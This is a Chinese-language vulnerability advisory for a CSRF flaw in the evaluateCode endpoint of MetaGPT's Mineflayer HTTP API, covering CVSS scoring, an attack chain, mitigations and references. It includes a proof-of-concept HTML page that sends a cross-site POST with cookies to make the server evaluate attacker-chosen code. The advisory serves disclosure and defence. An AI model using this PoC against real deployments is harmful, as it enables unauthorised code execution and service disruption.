CVE-2026-6109: MetaGPT Mineflayer API存在CSRF漏洞

漏洞信息

漏洞编号

CVE-2026-6109

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

FoundationAgents MetaGPT

漏洞概述

FoundationAgents MetaGPT 0.8.1及之前版本中的Mineflayer HTTP API组件存在跨站请求伪造（CSRF）漏洞。该漏洞位于文件`metagpt/environment/minecraft/mineflayer/index.js`的`evaluateCode`函数中。由于缺乏有效的请求验证，远程攻击者可诱导用户访问恶意页面，从而在用户不知情的情况下利用其身份发送恶意请求。此攻击可能导致系统完整性受损，且目前利用代码已公开，厂商尚未修复。

技术细节

该漏洞核心在于Mineflayer HTTP API未对关键操作实施足够的跨站请求伪造防护。在`evaluateCode`函数处理请求时，系统未验证请求来源的合法性或缺少Anti-CSRF Token。攻击者可构造包含恶意JavaScript或隐藏表单的网页，诱导已登录目标系统的用户访问。一旦用户访问，浏览器将自动携带用户的认证信息（如Session Cookie）向目标服务器发起POST请求，执行任意代码评估操作。由于CVSS向量显示无需特权（PR:N）且网络可达（AV:N），攻击者可远程发起攻击。尽管需要用户交互（UI:R），但仅需简单的点击或页面加载即可触发，这使得漏洞利用门槛较低，严重威胁API的完整性和安全性。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在运行FoundationAgents MetaGPT，且Mineflayer HTTP API接口（包含evaluateCode函数）处于开启状态。

STEP 2

武器化

攻击者编写一个恶意的HTML页面，包含针对`evaluateCode`接口的POST请求脚本，载荷为恶意的JavaScript代码。

STEP 3

投递

攻击者通过网络钓鱼、社会工程学或植入恶意广告等方式，将包含恶意脚本的链接发送给目标系统的合法用户。

STEP 4

利用

受害用户在已登录状态下点击链接或访问页面，浏览器自动携带Session Cookie向服务器发送请求，`evaluateCode`函数执行攻击者指定的代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-6109 -->
<!-- This HTML page demonstrates a CSRF attack against the vulnerable evaluateCode endpoint -->
<html>
  <body>
    <h1>CSRF Exploit Test</h1>
    <p>Attempting to execute code via CSRF...</p>
    <script>
      // Target URL based on the vulnerable component path
      // Adjust host and port to match the target environment
      const targetUrl = "http://target-host:3000/api/minecraft/evaluate";
      
      // Malicious payload to be executed by evaluateCode
      const payload = {
        code: "console.log('Vulnerable to CSRF'); process.exit(1);"
      };

      fetch(targetUrl, {
        method: "POST",
        headers: {
          "Content-Type": "application/json"
        },
        body: JSON.stringify(payload),
        credentials: "include" // Ensures cookies are sent with the request
      })
      .then(response => response.text())
      .then(data => console.log("CSRF Response:", data))
      .catch(error => console.error("CSRF Error:", error));
    </script>
  </body>
</html>

影响范围

FoundationAgents MetaGPT <= 0.8.1

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Mineflayer HTTP API组件或将其部署在内网环境中，通过防火墙限制访问来源，不直接暴露于公网。同时，管理员应加强对用户的安全教育，避免在登录系统状态下访问不明链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6109
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6109
3 Details https://www.cvedetails.com/cve/CVE-2026-6109/
4 VulDB https://vuldb.com/cve/CVE-2026-6109
5 Link https://github.com/FoundationAgents/MetaGPT/
6 Link https://github.com/FoundationAgents/MetaGPT/issues/1932
7 Link https://vuldb.com/submit/791759
8 Link https://vuldb.com/vuln/356969
9 Link https://vuldb.com/vuln/356969/cti